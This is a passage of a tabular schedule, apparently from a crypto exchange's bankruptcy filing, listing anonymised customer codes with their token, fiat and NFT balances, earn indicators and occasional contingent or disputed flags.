| 07362520 | | USD[10.00] | | |
| 07362523 | | USD[10.00] | | |
| 07362524 | | USD[10.00] | | |
| 07362525 | | USD[10.00] | | |
| 07362526 | | USD[10.00] | | |
| 07362527 | | USD[0.01] | | |
| 07362528 | | USD[10.00] | | |
| 07362529 | | DOGE[1], GRT[0], TRX[206.68416414], USD[0.00], USDT[0.00000010] | | |
| 07362530 | | USD[10.00] | | |
| 07362531 | | USD[10.00] | | |
| 07362532 | | USD[10.00] | | |
| 07362533 | | USD[10.00] | | |
| 07362534 | | USD[10.00] | | |
| 07362536 | | CUSDT[35.0908569], USD[0.00] | Yes | |
| 07362537 | | USD[0.00] | | |
| 07362538 | | DOGE[.00000001], ETH[0], ETHW[0], LINK[0], USD[0.00], USDT[0] | | |
| 07362539 | | DOGE[800.75917651], ETH[.0342369], ETHW[.0342369], TRX[1], USD[0.03] | | |
| 07362540 | | DOGE[848.439], TRX[2197.8], USD[15.03] | | |
| 07362541 | | ETH[.00609236], ETHW[.00601232], USD[0.00] | Yes | |
| 07362543 | | BRZ[1], DOGE[2469.77234805], USD[0.00] | | |
| 07362544 | | CUSDT[1], DOGE[1], USD[19.85] | | |
| 07362545 | | BTC[0], ETH[.00000001], SOL[.02], USD[0.28] | | |
| 07362546 | | USD[10.00] | | |
| 07362547 | | USD[10.00] | | |
| 07362548 | | DOGE[.709], ETH[0], MATIC[3.22164948], TRX[.000632], USD[11.13], USDT[0.01000000] | | |
| 07362549 | | GRT[49.21397234], USD[0.00] | | |
| 07362550 | | USD[10.00] | | |
| 07362551 | | USD[10.00] | | |
| 07362552 | | USD[10.00] | | |
| 07362553 | | SUSHI[39.848], USD[2.07] | | |
| 07362554 | | USD[10.00] | | |
| 07362555 | | SOL[0], SUSHI[0.48494894], USD[9.33] | | |
| 07362557 | | USD[10.00] | | |
| 07362558 | | BAT[1.0165555], CUSDT[8], DOGE[1], USD[0.00] | Yes | |
| 07362560 | | DOGE[1], USD[9.81] | Yes | |
| 07362561 | | NFT[311988034603210333/Saudi Arabia Ticket Stub #1755)[1], NFT (545012168369330544/Romeo #763)[1], USD[10.01] | Yes | |
| 07362563 | | USD[10.00] | | |
| 07362564 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362566 | | BTC[.00176879], CUSDT[1], DOGE[194.25545058], ETH[1.0215727], ETHW[1.02157269], USD[0.00], USDT[0.00052635] | | |
| 07362567 | | SOL[2.54], USD[1.74] | | |
| 07362568 | | CUSDT[3], DOGE[.00003686], SHIB[1], TRX[1.00001624], USD[0.00] | | |
| 07362569 | | BRZ[1], DOGE[2], USD[10.00] | | |
| 07362570 | | USD[10.00] | | |
| 07362571 | | USD[0.00] | | |
| 07362572 | | BTC[0], CUSDT[2], TRX[1], USD[0.01] | | |
| 07362573 | | DOGE[1], SUSHI[.0000381], TRX[2.71028599], USD[0.01] | | |
| 07362574 | | USD[10.00] | | |
| 07362575 | | USD[10.00] | | |
| 07362576 | | BRZ[1], SHIB[2], USD[0.44] | Yes | |
| 07362577 | | DOGE[1476.47481999], USD[0.00] | | |
| 07362578 | | USD[10.00] | | |
| 07362579 | | USD[10.00] | | |
| 07362580 | | BTC[.00222406], CUSDT[2491.52198855], DOGE[2808.80719944], GRT[22.76765961], SOL[3.72024936], SUSHI[2.66424458], TRX[2], USD[0.08] | | |
| 07362582 | | DOGE[43.36534652], USD[0.00], USDT[0] | | |
| 07362583 | | USD[0.00] | | |
| 07362584 | | TRX[1], USD[0.00] | | |
| 07362585 | | CUSDT[1], DOGE[2563.39302425], TRX[1201.36402871], USD[0.00] | | |
| 07362586 | | USD[10.00] | | |
| 07362587 | | USD[10.00] | | |
| 07362588 | | BAT[1.00976422], BRZ[1], CUSDT[19], DOGE[4], ETH[0], ETHW[0], GRT[.00004319], MATIC[0.00119334], SHIB[0], SOL[0], SUSHI[.0001135], USD[0.00], USDT[1.09979086] | Yes | |
| 07362591 | | BTC[0], USD[214.34] | | |
| 07362592 | | USD[10.00] | | |
| 07362593 | | DOGE[36.00554715], USD[0.00] | | |
| 07362594 | | SHIB[1], SOL[.88510153], TRX[3], USD[90.17], USDT[1.05537386] | Yes | |
| 07362595 | | USD[10.00] | | |
| 07362596 | | USD[10.00] | | |
| 07362601 | | BF_POINT[300], CUSDT[9], DOGE[1], LINK[0], NFT (300317978053835841/ApexDucks #7155)[1], NFT (317372702860480781/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #17)[1], NFT (319160530898670597/ApexDucks #1064)[1], NFT (328353851680860336/ApexDucks #1283)[1], NFT (431018593469099657/Scoogi #1911)[1], SHIB[1], SOL[0.00011997], SUSHI[.0001022], TRX[6], USD[0.00], USDT[1.09884011] | Yes | |
| 07362602 | | USD[200.00] | | |
| 07362603 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[.00000001], TRX[0], UNI[0], USD[0.00], USDT[0.00000004] | | |
| 07362605 | | USD[10.00] | | |
| 07362606 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07362607 | | CUSDT[1], DOGE[1], USD[2.01] | | |
| 07362608 | | TRX[0], USD[0.00] | | |
| 07362609 | | SOL[.00000001], USD[0.00] | | |
| 07362610 | | DOGE[1.69278714], TRX[1], USD[0.02] | | |
| 07362611 | | BF_POINT[200], SHIB[379812.49495712], USD[0.00] | Yes | |
| 07362612 | | BTC[0.00116320], CUSDT[7], USD[0.01] | | |
| 07362613 | | BF_POINT[300], BTC[0], DOGE[14.39672664], ETH[0], SOL[0], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07362614 | | USD[10.00] | | |
| 07362615 | | DOGE[1.05630216], USD[0.00] | | |
| 07362616 | | BAT[1], UNI[1], USD[0.01] | | |
| 07362617 | | BAT[0], BTC[0], CUSDT[6], DAI[0], DOGE[2.15245699], ETH[0], GRT[0], LINK[0], LTC[0], NFT (308618715495359754/You in, Miami? #247)[1], NFT (500827084252141005/You in, Miami? #222)[1], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | | |
| 07362618 | | USD[10.00] | | |
| 07362619 | | USD[10.00] | | |
| 07362620 | | USD[10.00] | | |
| 07362621 | | CUSDT[2], USD[0.00] | | |
| 07362623 | | USD[10.00] | | |
| 07362624 | | BAT[1.01574931], CUSDT[2], DAI[0], DOGE[5.0941456], GRT[1.00362453], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07362625 | | DOGE[1], USD[4625.76], USDT[1] | | |
| 07362629 | | CUSDT[2], ETH[0], SOL[0], USD[0.00] | Yes | |
| 07362630 | | SOL[.25], USD[0.00] | | |
| 07362631 | | BRZ[1], BTC[0], CUSDT[7], DOGE[0], ETH[0], TRX[3], USD[0.00] | Yes | |
| 07362632 | | BTC[0], DOGE[0], ETH[0], SHIB[2], USD[0.00] | Yes | |
| 07362634 | | BF_POINT[200], BRZ[4], BTC[0], CUSDT[1], DAI[0], DOGE[18.59382273], ETH[0], ETHW[0], GRT[1.00210901], LINK[0], SOL[0], SUSHI[0], TRX[9.00873918], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07362635 | | DOGE[26.61018141], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362636 | | USD[10.00] | | |
| 07362637 | | USD[10.00] | | |
| 07362638 | | BRZ[0.00007558], CUSDT[1], DOGE[9], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[10.00] | | |
| 07362640 | | CUSDT[379.02171652], USD[2.00] | | |
| 07362641 | | CUSDT[2], DOGE[1], GRT[1.09192231], TRX[1], USD[0.00] | | |
| 07362642 | | DOGE[.30875], USD[0.01], USDT[0] | | |
| 07362643 | | DOGE[1], UNI[.81664753], USD[0.00] | | |
| 07362644 | | USD[0.00] | | |
| 07362646 | | USD[10.00] | | |
| 07362647 | | CUSDT[3], DOGE[5.11406657], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07362648 | | BRZ[1], DOGE[187.74253299], USD[0.00] | | |
| 07362649 | | BRZ[1], DOGE[2], GRT[1.00367734], NFT (364999337053928857/Australia Ticket Stub #2252)[1], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07362650 | | BTC[.00042231], USD[0.00], USDT[0.00043335] | | |
| 07362652 | | DOGE[.9914921], USD[0.01] | | |
| 07362653 | | BTC[0], SUSHI[0.03054764] | | |
| 07362654 | | USD[10.00] | | |
| 07362655 | | USD[10.00] | | |
| 07362656 | | CUSDT[467.72750382], DOGE[2158.80589329], USD[0.00] | | |
| 07362657 | | CUSDT[3], LINK[2.06547338], SOL[6.71284712], TRX[1], USD[0.00] | | |
| 07362658 | | USD[10.00] | | |
| 07362659 | | USD[10.00] | | |
| 07362660 | | DOGE[475.24447371], ETH[.00571114], ETHW[.00571114], GRT[35.21671834], SOL[2.79283271], SUSHI[1.88807942], USD[0.00] | | |
| 07362661 | | USD[10.00] | | |
| 07362662 | | SOL[0], USD[0.00] | Yes | |
| 07362663 | | CUSDT[1], DOGE[174.19508604], USD[0.00] | | |
| 07362664 | | DAI[28.72758353], DOGE[2], TRX[1], USD[88.42], USDT[54.96247019] | Yes | |
| 07362665 | | USD[10.00] | | |
| 07362666 | | CUSDT[1], USD[0.17] | | |
| 07362667 | | CUSDT[891.95525286], DOGE[1], USD[61.31] | | |
| 07362668 | | USD[10.00] | | |
| 07362669 | | USD[10.00] | | |
| 07362670 | | USD[10.00] | | |
| 07362671 | | USD[10.00] | | |
| 07362672 | | BRZ[0.00000002], DOGE[.00003556], USD[0.01], USDT[.00002819] | | |
| 07362673 | | BTC[0], DOGE[0.99003733], LINK[.08023212], USD[0.00] | | |
| 07362674 | | USD[10.00] | | |
| 07362675 | | USD[10.00] | | |
| 07362676 | | BAT[107.15408187], BRZ[2], CUSDT[136.59493228], ETHW[.34393504], GRT[.00087852], SHIB[881968.09443], SOL[0], TRX[1038.13612278], USD[0.00] | Yes | |
| 07362677 | | AAVE[0], AVAX[0], BTC[0], DAI[.00000001], ETH[0], NFT (379242396042216071/Entrance Voucher #29743)[1], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07362678 | | USD[10.00] | | |
| 07362679 | | BTC[0.00359927], DOGE[0], ETH[0], NFT (322327171639216091/Golden bone pass)[1], NFT (330408884859183089/Cyber Frogs Ramen)[1], NFT (506887618012533833/Frog #959)[1], SOL[0.50473738], TRX[0], USD[589.09] | Yes | |
| 07362681 | | USD[10.00] | | |
| 07362682 | | GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.07] | | |
| 07362683 | | BAT[8.46700762], BTC[.00791452], CUSDT[1298.77125446], DOGE[2560.23894475], ETH[.18146884], ETHW[.16684676], GRT[128.57783562], SHIB[6949180.9423265], SOL[.72044938], SUSHI[17.11695348], TRX[2264.98928684], USD[0.00], USDT[6.96154712] | | |
| 07362685 | | TRX[2], USD[0.01], USDT[0] | | |
| 07362686 | | CUSDT[6], TRX[4], USD[0.02] | | |
| 07362687 | | USD[10.00] | | |
| 07362688 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07362689 | | USD[10.00] | | |
| 07362690 | | USD[10.00] | | |
| 07362691 | | USD[11.05] | Yes | |
| 07362692 | | USD[10.00] | | |
| 07362693 | | BCH[.00031511], BTC[.0000722], CUSDT[8], DAI[3.91065201], DOGE[27.52483523], ETH[.00107035], ETHW[.00107035], TRX[5.25830236], USD[0.00] | | |
| 07362694 | | USD[10.00] | | |
| 07362695 | | USD[10.00] | | |
| 07362697 | | USD[10.00] | | |
| 07362698 | | USD[10.00] | | |
| 07362699 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362700 | | DOGE[36.68720416], USD[0.00] | | |
| 07362701 | | BTC[.00000167], ETH[.006125], ETHW[.00604292], SHIB[269811.55923920], USD[0.00] | Yes | |
| 07362702 | | BTC[.00016364], USD[0.00] | | |
| 07362703 | | CUSDT[3], DOGE[574.16248268], GRT[.14908235], USD[0.03] | Yes | |
| 07362704 | | USD[10.00] | | |
| 07362705 | | BTC[0], DOGE[1], UNI[0], USD[0.00] | | |
| 07362706 | | CUSDT[2], DOGE[1528.60600881], ETH[.06829748], ETHW[.06744932], SHIB[3.6498066], USD[0.00] | Yes | |
| 07362707 | | CUSDT[3], DOGE[3965.34805375], ETH[.33461843], ETHW[.33461843], LTC[1.16723039], TRX[4], USD[0.00] | | |
| 07362708 | | USD[10.00] | | |
| 07362710 | | BTC[.0021131], DOGE[1498.76055145], ETH[1.17899454], ETHW[1.17899454], LTC[.16830138], SOL[2.83835212], TRX[2], USD[0.00], USDT[10.94109296] | | |
| 07362711 | | USD[10.00] | | |
| 07362712 | | BRZ[1], TRX[1], USD[0.00] | Yes | |
| 07362713 | | USD[0.15] | | |
| 07362715 | | EUR[0.00], USD[0.00] | | |
| 07362716 | | BTC[.00076964], CUSDT[3], DOGE[559.33205886], ETH[.00732783], ETHW[.00723207], TRX[2], UNI[1.2232153], USD[0.00] | Yes | |
| 07362717 | | USD[0.00], USDT[0] | | |
| 07362718 | | BRZ[0], BTC[0], LTC[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07362719 | | CUSDT[1], ETH[.02136946], ETHW[.02136946], USD[0.00] | | |
| 07362720 | | USD[10.00] | | |
| 07362721 | | ETH[.00000001], ETHW[0], SHIB[1], USD[0.00] | Yes | |
| 07362722 | | BRZ[2], CUSDT[1], DOGE[1], ETH[.0003], ETHW[.0003], TRX[4], USD[1.92] | | |
| 07362723 | | USD[0.12] | Yes | |
| 07362724 | | CUSDT[1], DOGE[8], ETH[0], TRX[0], USD[12.36], USDT[0.00054648] | | |
| 07362725 | | USD[10.00] | | |
| 07362726 | | BRZ[1], CUSDT[6], GRT[2], TRX[1], USD[0.00], USDT[0] | | |
| 07362727 | | USD[10.00] | | |
| 07362728 | | USD[10.00] | | |
| 07362729 | | USD[10.00] | | |
| 07362730 | | USD[10.00] | | |
| 07362732 | | BRZ[0], DOGE[0], TRX[0], USD[0.05] | | |
| 07362733 | | BRZ[1], CUSDT[1], DOGE[.00001405], USD[0.37] | | |
| 07362734 | | DOGE[0], LINK[0], LTC[0], USD[0.25], USDT[1.06731087] | Yes | |
| 07362735 | | USD[10.00] | | |
| 07362736 | | USD[10.00] | | |
| 07362737 | | USD[1.97] | | |
| 07362738 | | BAT[3.66287273], BRZ[5], CUSDT[9], DOGE[11885.38665131], GRT[2], TRX[630.03253359], USD[0.36], USDT[1] | | |
| 07362739 | | USD[10.00] | | |
| 07362741 | | USD[10.79] | Yes | |
| 07362742 | | USD[10.00] | | |
| 07362743 | | SOL[.69306929], USD[0.00] | | |
| 07362744 | | USD[10.93] | Yes | |
| 07362745 | | CUSDT[277.69362537], DOGE[.37671356], ETH[.00032349], ETHW[0.00032349], SHIB[311859.38127848], USD[3.28] | Yes | |
| 07362746 | | USD[0.00] | | |
| 07362747 | | USD[10.00] | | |
| 07362748 | | USD[10.00] | | |
| 07362749 | | CUSDT[1], USD[0.00] | | |
| 07362751 | | USD[10.00] | | |
| 07362752 | | USD[10.00] | | |
| 07362753 | | USD[10.00] | | |
| 07362754 | | CUSDT[1], DOGE[2], LINK[.36682892], USD[0.00] | | |
| 07362755 | | USD[10.00] | | |
| 07362756 | | USD[10.00] | | |
| 07362757 | | USD[10.00] | | |
| 07362761 | | USD[0.00] | | |
| 07362762 | | BTC[.00000926], CUSDT[1], DOGE[172.78138368], USD[10.17] | | |
| 07362763 | | USD[0.01] | | |
| 07362764 | | CUSDT[3], DOGE[4476.91191693], USD[0.00] | | |
| 07362765 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362766 | | USD[10.00] | | |
| 07362767 | | USD[10.00] | | |
| 07362768 | | BRZ[1], CUSDT[3], DOGE[65.55544617], TRX[3], USD[0.01] | | |
| 07362769 | | DOGE[3.28847852], NFT (430308284946099546/Australia Ticket Stub #603)[1], NFT (534632020074275069/Entrance Voucher #2241)[1], USD[0.00] | Yes | |
| 07362771 | | BAT[1], BRZ[5], CUSDT[8], GRT[1], TRX[4], UNI[1], USD[0.01], USDT[2] | | |
| 07362772 | | USD[10.00] | | |
| 07362773 | | SOL[.0057], USD[0.30], USDT[.026411] | | |
| 07362774 | | USD[10.00] | | |
| 07362775 | | USD[10.00] | | |
| 07362776 | | USD[10.00] | | |
| 07362777 | | TRX[150.23695372], USD[0.00] | | |
| 07362778 | | USD[10.00] | | |
| 07362780 | | CUSDT[6], DOGE[.00126479], SHIB[2], TRX[1], USD[0.01] | Yes | |
| 07362781 | | CUSDT[2], USD[0.00] | | |
| 07362782 | | USD[10.00] | | |
| 07362783 | | USD[10.00] | | |
| 07362785 | | BAT[3.05332461], BRZ[5.01703833], CUSDT[1], DOGE[9.01267682], ETH[.00007473], ETHW[10.26070955], GRT[6.00420284], LINK[0.00375268], NFT (294737795933840529/Belugie #4298)[1], NFT (296858395179407127/Cool Bean #1750)[1], NFT (300594795644895178/Barcelona Ticket Stub #134)[1], NFT (313524860698208932/Astral Apes #927)[1], NFT (323483238362722646/GOONEY #4603)[1], NFT (338182219231909128/Oink 1685)[1], NFT (355157622745474418/Fancy Frenchies #6580)[1], NFT (424299324173115299/Naked Meerkat #4717)[1], NFT (435292615686578950/Kiddo #5523)[1], NFT (440052899306605207/ApexDucks #2647)[1], NFT (440779396612272490/Bahrain Ticket Stub #957)[1], NFT (443768619117738755/Kiddo #2604)[1], NFT (456403345315753471/Kiddo #2824)[1], NFT (457194478583146590/SharkBro #8924)[1], NFT (478451252656251053/Sigma Shark #6450)[1], NFT (480599815028829739/Sigma Shark #510)[1], NFT (495202388950705574/JungleCats #1617)[1], NFT (520766581785915520/Anti Artist #611)[1], NFT (537218316692348601/LightPunk #2028)[1], NFT (565509602423416398/SolDad #3037)[1], NFT (566333195523119005/SOL BROBOT #4193)[1], NFT (568594686453262595/Elbit Ape #6128)[1], NFT (575066886685153685/Oink 1956)[1], SHIB[2822.98784243], SOL[0], SUSHI[1.02673291], UNI[1.06078946], USD[29.56], USDT[0] | Yes | |
| 07362786 | | CUSDT[1], DAI[0], DOGE[1], NFT (557095304244777313/Entrance Voucher #2440)[1], SOL[0], TRX[1], USD[0.00] | | |
| 07362787 | | USD[10.00] | | |
| 07362788 | | USD[10.00] | | |
| 07362790 | | CUSDT[1], DOGE[4015.24109731], TRX[1], USD[0.00] | | |
| 07362791 | | USD[10.00] | | |
| 07362792 | | USD[10.00] | | |
| 07362794 | | USD[11.08] | Yes | |
| 07362795 | | USD[10.00] | | |
| 07362796 | | BRZ[2], CUSDT[2], DAI[.0000024], SHIB[13907500.7397112], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07362798 | | DOGE[88.09125375], USD[0.00], USDT[5.50103189] | Yes | |
| 07362799 | | USD[10.00] | | |
| 07362800 | | USD[10.00] | | |
| 07362803 | | ETHW[.00542802], USD[0.02] | | |
| 07362804 | | CUSDT[2], DOGE[2], TRX[392.30786224], USD[0.00] | | |
| 07362808 | | DOGE[1.01094169], USD[0.00] | | |
| 07362809 | | USD[10.00] | | |
| 07362810 | | DOGE[317.59370681], TRX[169.56880856], USD[0.00] | | |
| 07362811 | | CUSDT[2], DOGE[4608.70943588], GRT[1], SUSHI[1.0440288], USD[0.01] | | |
| 07362813 | | BTC[0.00000004], CUSDT[4], DOGE[1], ETH[0], ETHW[0], GRT[1], TRX[1], USD[0.00], USDT[0.00089514] | | |
| 07362815 | | USD[10.00] | | |
| 07362817 | | BAT[3.17866484], BRZ[11.80460768], CUSDT[16], DOGE[17.39282945], GRT[6.23098204], SHIB[3], TRX[16.67589818], USD[1352.81], USDT[3.2842731] | Yes | |
| 07362818 | | BTC[0], CUSDT[2], DOGE[0], TRX[0], USD[0.00] | | |
| 07362819 | | BAT[1], CUSDT[28], TRX[4], USD[0.01], USDT[.99428125] | Yes | |
| 07362820 | | BRZ[5.02660006], CUSDT[2], DOGE[4], ETH[.00000141], ETHW[0.00000140], GRT[1], SHIB[66.92171997], SOL[.00003715], TRX[2], USD[0.01] | Yes | |
| 07362822 | | USD[10.00] | | |
| 07362823 | | BRZ[2], CUSDT[7], DOGE[1.00934847], USD[0.00] | | |
| 07362824 | | USD[10.00] | | |
| 07362825 | | USD[10.00] | | |
| 07362826 | | CUSDT[2], TRX[3], USD[0.00] | | |
| 07362827 | | USD[10.00] | | |
| 07362828 | | USD[10.00] | | |
| 07362829 | | CUSDT[1], USD[0.00] | | |
| 07362830 | | BAT[1], BRZ[3], CUSDT[5], LINK[1], TRX[8], USD[0.00], USDT[2] | | |
| 07362831 | | BRZ[4], CUSDT[1049.07643297], DOGE[2.97321108], GRT[1], SHIB[1], TRX[1380.88098103], USD[101.47], USDT[1.10468606] | Yes | |
| 07362832 | | BRZ[1], DOGE[2], SOL[1.3547341], UNI[.00001207], USD[176.73] | | |
| 07362833 | | DOGE[281.34650213], USD[-10.00] | | |
| 07362834 | | DOGE[.81704522], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362835 | | BCH[0], CUSDT[5], DOGE[261.23060400], ETH[0], LINK[0], TRX[1], USD[0.00] | | |
| 07362836 | | USD[10.00] | | |
| 07362837 | | DOGE[1], GRT[0], TRX[0], USD[0.01] | | |
| 07362839 | | CUSDT[1], DOGE[2], USD[30.21] | | |
| 07362841 | | USD[10.00] | | |
| 07362844 | | USD[0.00], USDT[0.00000001] | | |
| 07362845 | | USD[10.00] | | |
| 07362847 | | DOGE[1], USD[0.00] | | |
| 07362849 | | CUSDT[8], LINK[2.12804706], TRX[1316.31760623], USD[0.00] | | |
| 07362850 | | BTC[0], USD[0.00] | | |
| 07362851 | | USD[10.00] | | |
| 07362852 | | BAT[1], BRZ[4], CUSDT[8], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[5], USD[0.00] | | |
| 07362853 | | DOGE[0], USD[0.01] | | |
| 07362854 | | USD[0.00] | | |
| 07362856 | | USD[10.00] | | |
| 07362857 | | BRZ[4], CUSDT[8], DOGE[3], GRT[2], TRX[145.16056261], USD[6.07], USDT[0] | | |
| 07362858 | | USD[10.00] | | |
| 07362859 | | TRX[123.82358309], USD[0.00] | | |
| 07362860 | | DOGE[174.89277761], USD[0.00] | | |
| 07362861 | | CUSDT[3], GRT[0], SOL[0], TRX[3], UNI[0.00019173], USD[0.00] | Yes | |
| 07362862 | | BAT[1], BRZ[1], BTC[.00017758], CUSDT[6], DOGE[1], USD[0.00], USDT[1] | | |
| 07362864 | | DOGE[22.931], SOL[0], TRX[384.842] | | |
| 07362865 | | BRZ[1], USD[0.01] | | |
| 07362867 | | BCH[.02178724], BRZ[1], CUSDT[60], DOGE[45.20758694], USD[0.00], USDT[0] | | |
| 07362868 | | USD[10.00] | | |
| 07362869 | | USD[10.00] | | |
| 07362871 | | BRZ[1], USD[0.00] | | |
| 07362872 | | USD[10.00] | | |
| 07362873 | | USD[10.00] | | |
| 07362874 | | BTC[.0002108], TRX[1], USD[0.00] | | |
| 07362875 | | BAT[10.91947859], BTC[.00130448], CUSDT[20], DOGE[53.51001485], ETH[.01813313], ETHW[.01813313], LTC[.03114129], SUSHI[2.07102809], TRX[1], UNI[.76032026], USD[4.91], USDT[0.00001501], YFI[.00055236] | | |
| 07362876 | | BRZ[1], CUSDT[8], TRX[2], USD[0.80] | | |
| 07362877 | | USD[10.00] | | |
| 07362878 | | BRZ[5.07952967], BTC[.00211124], CUSDT[2335.32020305], DOGE[2683.12457581], ETH[.07081097], ETHW[.06993263], LINK[6.63162451], LTC[.28522808], SHIB[4607119.44161781], SUSHI[16.56356641], TRX[2403.37275404], UNI[2.20742175], USD[2.15] | Yes | |
| 07362879 | | USD[0.00] | | |
| 07362880 | | USD[10.00] | | |
| 07362881 | | BAT[0], BTC[0], CUSDT[2], DOGE[5], GRT[0], LINK[0], TRX[3], USD[0.00] | | |
| 07362882 | | GBP[11.35], USD[0.00] | | |
| 07362883 | | USD[10.00] | | |
| 07362884 | | CUSDT[1], GRT[1.00026477], SHIB[1172.79124315], USD[0.00], USDT[0] | Yes | |
| 07362885 | | ETH[0], ETHW[0], NEAR[0], USD[0.00] | | |
| 07362886 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07362887 | | BAT[0], BRZ[2], BTC[0], CUSDT[20], DOGE[1], ETH[0], GRT[1], SHIB[1], SOL[0], TRX[11], UNI[0], USD[0.00], USDT[0] | | |
| 07362888 | | USD[0.00] | | |
| 07362889 | | ETH[.00465456], ETHW[.00465456], USD[0.00] | | |
| 07362890 | | GRT[4.33719238], USD[0.00] | | |
| 07362891 | | USD[10.00] | | |
| 07362892 | | USD[10.00] | | |
| 07362893 | | BRZ[1], CUSDT[1], DOGE[1], TRX[5], USD[0.00], USDT[1] | | |
| 07362895 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07362896 | | DOGE[1], UNI[10.86607605], USD[116.98] | Yes | |
| 07362897 | | USD[10.00] | | |
| 07362898 | | USD[10.00] | | |
| 07362899 | | BTC[.09292451], DOGE[0], ETH[.00000001], ETHW[0], SOL[0], TRX[0], USD[4615.04] | | |
| 07362900 | | BTC[.00561242], CUSDT[3], DOGE[5], ETH[.12975221], ETHW[.12975221], TRX[4], USD[0.01] | | |
| 07362901 | Contingent, Disputed | AAVE[0], AVAX[0], BTC[0], LINK[0], MATIC[0], MKR[0], PAXG[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07362902 | | DOGE[1], LTC[0], TRX[1], USD[0.00] | | |
| 07362903 | | USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362904 | | BRZ[1], CUSDT[6], DOGE[0], USD[0.00], USDT[0] | | |
| 07362905 | | CUSDT[2], DOGE[36.91052515], USD[1.66] | Yes | |
| 07362907 | | USD[10.00] | | |
| 07362908 | | BRZ[2], CUSDT[2], DOGE[6.14777415], ETHW[.05765059], GRT[1.00395377], TRX[1], USD[0.00] | Yes | |
| 07362910 | | CUSDT[1], USD[0.00] | | |
| 07362911 | | USD[10.00] | | |
| 07362912 | | AVAX[60.83386954], BAT[1], BF_POINT[300], BTC[1.10638456], DOGE[2], MATIC[4.09332936], SOL[195.55084033], SUSHI[784.09141255], TRX[4], UNI[218.04701195], USD[154347.45], USDT2.01685621] | Yes | |
| 07362913 | | USD[10.00] | | |
| 07362914 | | BAT[1.0165555], BRZ[1], BTC[0], CUSDT[27], DOGE[1], ETH[0.00000001], GRT[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07362915 | | USD[10.00] | | |
| 07362916 | | USD[10.97] | Yes | |
| 07362918 | | TRX[175.57776497], USD[0.00] | | |
| 07362919 | | USD[10.00] | | |
| 07362920 | | USD[10.00] | | |
| 07362921 | | CUSDT[2], DOGE[0], SOL[0], UNI[0], USD[0.00] | | |
| 07362922 | | USD[0.02] | | |
| 07362924 | | USD[10.00] | | |
| 07362925 | | BTC[0], SUSHI[0] | | |
| 07362926 | | USD[10.00] | | |
| 07362928 | | CUSDT[1], DOGE[1579.28033731], SHIB[816771.03185407], USD[0.00] | | |
| 07362929 | | USD[10.00] | | |
| 07362931 | | USD[10.00] | | |
| 07362932 | | USD[10.00] | | |
| 07362933 | | DOGE[135.28239184], USD[0.00] | | |
| 07362934 | | USD[10.00] | | |
| 07362935 | | USD[10.00] | | |
| 07362936 | | BRZ[1], CUSDT[2], TRX[1], USD[0.00] | | |
| 07362939 | | BTC[.00000002], CUSDT[1], USD[0.00] | | |
| 07362940 | | DOGE[53.36394289], USD[0.00] | | |
| 07362941 | | USD[10.00] | | |
| 07362942 | | USD[10.00] | | |
| 07362943 | | USD[10.00] | | |
| 07362944 | | USD[10.00] | | |
| 07362945 | | DOGE[136.07360166], USD[0.00] | | |
| 07362946 | | USD[10.00] | | |
| 07362947 | | BTC[0.00008565], ETH[.0008252], ETHW[.0008252], LTC[.00281], SUSHI[46.822825], USD[3.85], USDT[.0020585] | | |
| 07362948 | | USD[10.00] | | |
| 07362949 | | DOGE[1], USD[0.00], USDT[0.00043555] | | |
| 07362951 | | USD[0.00] | | |
| 07362952 | | USD[0.58] | | |
| 07362953 | | BTC[0], CUSDT[1], DOGE[2], NFT (440523940826054444/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #76)[1], SHIB[1976254.05505358], USD[0.00], USDT[0] | Yes | |
| 07362955 | | USD[10.00] | | |
| 07362956 | | BTC[.00016613], CUSDT[1], USD[0.00] | | |
| 07362957 | | BRZ[0], USD[0.00] | | |
| 07362958 | | USD[10.00] | | |
| 07362959 | | CUSDT[1], DOGE[26.41154568], USD[0.00] | | |
| 07362960 | | USD[10.00] | | |
| 07362961 | | USD[10.00] | | |
| 07362962 | | USD[10.00] | | |
